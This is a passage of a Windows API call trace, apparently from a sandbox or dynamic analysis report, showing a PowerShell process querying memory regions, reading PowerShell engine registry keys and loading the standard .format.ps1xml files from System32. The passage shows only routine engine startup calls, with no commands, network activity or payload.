__alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.136] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.136] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.136] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.137] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.137] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.137] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.138] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.139] VirtualQuery (in: lpAddress=0xcc010, lpBuffer=0xcced0, dwLength=0x30 | out: lpBuffer=0xcced0*(BaseAddress=0xcc000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0135.140] CoTaskMemAlloc (cb=0x78) returned 0x1487c0 [0135.140] RegQueryValueExW (in: hKey=0x304, lpValueName="path", lpReserved=0x0, lpType=0xcd41c, lpData=0x1487c0, lpcbData=0xcd418*=0x74 | out: lpType=0xcd41c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0xcd418*=0x74) returned 0x0 [0135.140] CoTaskMemFree (pv=0x1487c0) [0135.140] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a [0135.140] SetErrorMode (uMode=0x1) returned 0x1 [0135.140] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0xcd3a0 | out: lpFileInformation=0xcd3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1 [0135.141] SetErrorMode (uMode=0x1) returned 0x1 [0135.142] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.142] SetErrorMode (uMode=0x1) returned 0x1 [0135.142] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd3a0 | out: lpFileInformation=0xcd3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0135.143] SetErrorMode (uMode=0x1) returned 0x1 [0135.144] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0135.144] SetErrorMode (uMode=0x1) returned 0x1 [0135.144] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd3a0 | out: lpFileInformation=0xcd3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0135.145] SetErrorMode (uMode=0x1) returned 0x1 [0135.145] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.145] SetErrorMode (uMode=0x1) returned 0x1 [0135.145] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\certificate.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd3a0 | out: lpFileInformation=0xcd3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67ddf6d2, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67ddf6d2, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5dddcd9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6aca)) returned 1 [0135.146] SetErrorMode (uMode=0x1) returned 0x1 [0135.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.147] SetErrorMode (uMode=0x1) returned 0x1 [0135.147] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd3a0 | out: lpFileInformation=0xcd3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1 [0135.147] SetErrorMode (uMode=0x1) returned 0x1 [0135.147] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43 [0135.147] SetErrorMode (uMode=0x1) returned 0x1 [0135.148] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd3a0 | out: lpFileInformation=0xcd3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1 [0135.148] SetErrorMode (uMode=0x1) returned 0x1 [0135.148] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d [0135.148] SetErrorMode (uMode=0x1) returned 0x1 [0135.148] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd3a0 | out: lpFileInformation=0xcd3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e51ae9, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e51ae9, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e9c3af, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3ef37)) returned 1 [0135.149] SetErrorMode (uMode=0x1) returned 0x1 [0135.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47 [0135.149] SetErrorMode (uMode=0x1) returned 0x1 [0135.149] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd3a0 | out: lpFileInformation=0xcd3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1 [0135.149] SetErrorMode (uMode=0x1) returned 0x1 [0135.149] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0135.149] SetErrorMode (uMode=0x1) returned 0x1 [0135.150] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd3a0 | out: lpFileInformation=0xcd3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0135.150] SetErrorMode (uMode=0x1) returned 0x1 [0135.150] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xcd190, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0135.150] SetErrorMode (uMode=0x1) returned 0x1 [0135.150] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xcd3a0 | out: lpFileInformation=0xcd3a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0135.150] SetErrorMode (uMode=0x1) returned 0x1 [0135.152] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0135.152] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.153] CoTaskMemFree (pv=0x10ccc0) [0135.176] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0135.176] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.177] CoTaskMemFree (pv=0x10ccc0) [0135.177] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0135.177] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.177] CoTaskMemFree (pv=0x10ccc0) [0135.178] CoTaskMemAlloc (cb=0x104) returned 0x10ccc0 [0135.178] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x10ccc0, nSize=0x80 | out: lpBuffer="") returned 0x0 [0135.178] CoTaskMemFree (pv=0x10ccc0) [0135.179] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.179] SetErrorMode (uMode=0x1) returned 0x1 [0135.179] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308 [0135.180] GetFileType (hFile=0x308) returned 0x1 [0135.180] SetErrorMode (uMode=0x1) returned 0x1 [0135.180] GetFileType (hFile=0x308) returned 0x1 [0135.180] ReadFile (in: hFile=0x308, lpBuffer=0x32a9838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32a9838*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.186] ReadFile (in: hFile=0x308, lpBuffer=0x32a9838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32a9838*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.186] ReadFile (in: hFile=0x308, lpBuffer=0x32a9838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32a9838*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.186] ReadFile (in: hFile=0x308, lpBuffer=0x32a9838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32a9838*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.187] ReadFile (in: hFile=0x308, lpBuffer=0x32a9838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32a9838*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.187] ReadFile (in: hFile=0x308, lpBuffer=0x32a9838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32a9838*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.187] ReadFile (in: hFile=0x308, lpBuffer=0x32a9838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32a9838*, lpNumberOfBytesRead=0xcd038*=0x9e2, lpOverlapped=0x0) returned 1 [0135.187] ReadFile (in: hFile=0x308, lpBuffer=0x32a8d82, nNumberOfBytesToRead=0x21e, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32a8d82*, lpNumberOfBytesRead=0xcd038*=0x0, lpOverlapped=0x0) returned 1 [0135.187] ReadFile (in: hFile=0x308, lpBuffer=0x32a9838, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32a9838*, lpNumberOfBytesRead=0xcd038*=0x0, lpOverlapped=0x0) returned 1 [0135.188] CloseHandle (hObject=0x308) returned 1 [0135.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.188] SetErrorMode (uMode=0x1) returned 0x1 [0135.188] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\diagnostics.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccfe0 | out: lpFileInformation=0xccfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d93418, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d93418, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e03e37, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x69e2)) returned 1 [0135.188] SetErrorMode (uMode=0x1) returned 0x1 [0135.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.189] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd0c8 | out: phkResult=0xcd0c8*=0x308) returned 0x0 [0135.189] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd04c, lpData=0x0, lpcbData=0xcd048*=0x0 | out: lpType=0xcd04c*=0x1, lpData=0x0, lpcbData=0xcd048*=0x56) returned 0x0 [0135.189] CoTaskMemAlloc (cb=0x5a) returned 0x1b80a6d0 [0135.189] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd01c, lpData=0x1b80a6d0, lpcbData=0xcd018*=0x56 | out: lpType=0xcd01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd018*=0x56) returned 0x0 [0135.189] CoTaskMemFree (pv=0x1b80a6d0) [0135.189] RegCloseKey (hKey=0x308) returned 0x0 [0135.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", nBufferLength=0x105, lpBuffer=0xccbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Diagnostics.Format.ps1xml", lpFilePart=0x0) returned 0x44 [0135.237] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x3f624de6, Data2=0xe23a, Data3=0x4d5d, Data4=([0]=0xb8, [1]=0x9b, [2]=0x71, [3]=0x7f, [4]=0x27, [5]=0x19, [6]=0x28, [7]=0x63))) returned 0x0 [0135.256] CoCreateGuid (in: pguid=0xcd2f0 | out: pguid=0xcd2f0*(Data1=0x6d9129e7, Data2=0xbf34, Data3=0x46a8, Data4=([0]=0x93, [1]=0x64, [2]=0x3a, [3]=0xbe, [4]=0xdd, [5]=0xa3, [6]=0x5c, [7]=0xf5))) returned 0x0 [0135.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccab0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0135.259] SetErrorMode (uMode=0x1) returned 0x1 [0135.259] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x308 [0135.259] GetFileType (hFile=0x308) returned 0x1 [0135.259] SetErrorMode (uMode=0x1) returned 0x1 [0135.259] GetFileType (hFile=0x308) returned 0x1 [0135.259] ReadFile (in: hFile=0x308, lpBuffer=0x32d43a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32d43a0*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.262] ReadFile (in: hFile=0x308, lpBuffer=0x32d43a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32d43a0*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.262] ReadFile (in: hFile=0x308, lpBuffer=0x32d43a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32d43a0*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.262] ReadFile (in: hFile=0x308, lpBuffer=0x32d43a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32d43a0*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.262] ReadFile (in: hFile=0x308, lpBuffer=0x32d43a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32d43a0*, lpNumberOfBytesRead=0xcd038*=0x1000, lpOverlapped=0x0) returned 1 [0135.263] ReadFile (in: hFile=0x308, lpBuffer=0x32d43a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32d43a0*, lpNumberOfBytesRead=0xcd038*=0xfb2, lpOverlapped=0x0) returned 1 [0135.263] ReadFile (in: hFile=0x308, lpBuffer=0x32d3aba, nNumberOfBytesToRead=0x4e, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32d3aba*, lpNumberOfBytesRead=0xcd038*=0x0, lpOverlapped=0x0) returned 1 [0135.263] ReadFile (in: hFile=0x308, lpBuffer=0x32d43a0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xcd038, lpOverlapped=0x0 | out: lpBuffer=0x32d43a0*, lpNumberOfBytesRead=0xcd038*=0x0, lpOverlapped=0x0) returned 1 [0135.264] CloseHandle (hObject=0x308) returned 1 [0135.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0135.264] SetErrorMode (uMode=0x1) returned 0x1 [0135.264] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\wsman.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0xccfe0 | out: lpFileInformation=0xccfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67f36317, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67f36317, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe6065417, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x5fb2)) returned 1 [0135.264] SetErrorMode (uMode=0x1) returned 0x1 [0135.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", nBufferLength=0x105, lpBuffer=0xccd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\WSMan.format.ps1xml", lpFilePart=0x0) returned 0x3e [0135.264] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd0c8 | out: phkResult=0xcd0c8*=0x308) returned 0x0 [0135.264] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd04c, lpData=0x0, lpcbData=0xcd048*=0x0 | out: lpType=0xcd04c*=0x1, lpData=0x0, lpcbData=0xcd048*=0x56) returned 0x0 [0135.265] CoTaskMemAlloc (cb=0x5a) returned 0x1b80a900 [0135.265] RegQueryValueExW (in: hKey=0x308, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd01c, lpData=0x1b80a900, lpcbData=0xcd018*=0x56 | out: lpType=0xcd01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd018*=0x56) returned 0x0 [0135.265] CoTaskMemFree (pv=0x1b80a900) [0135.265] RegCloseKey 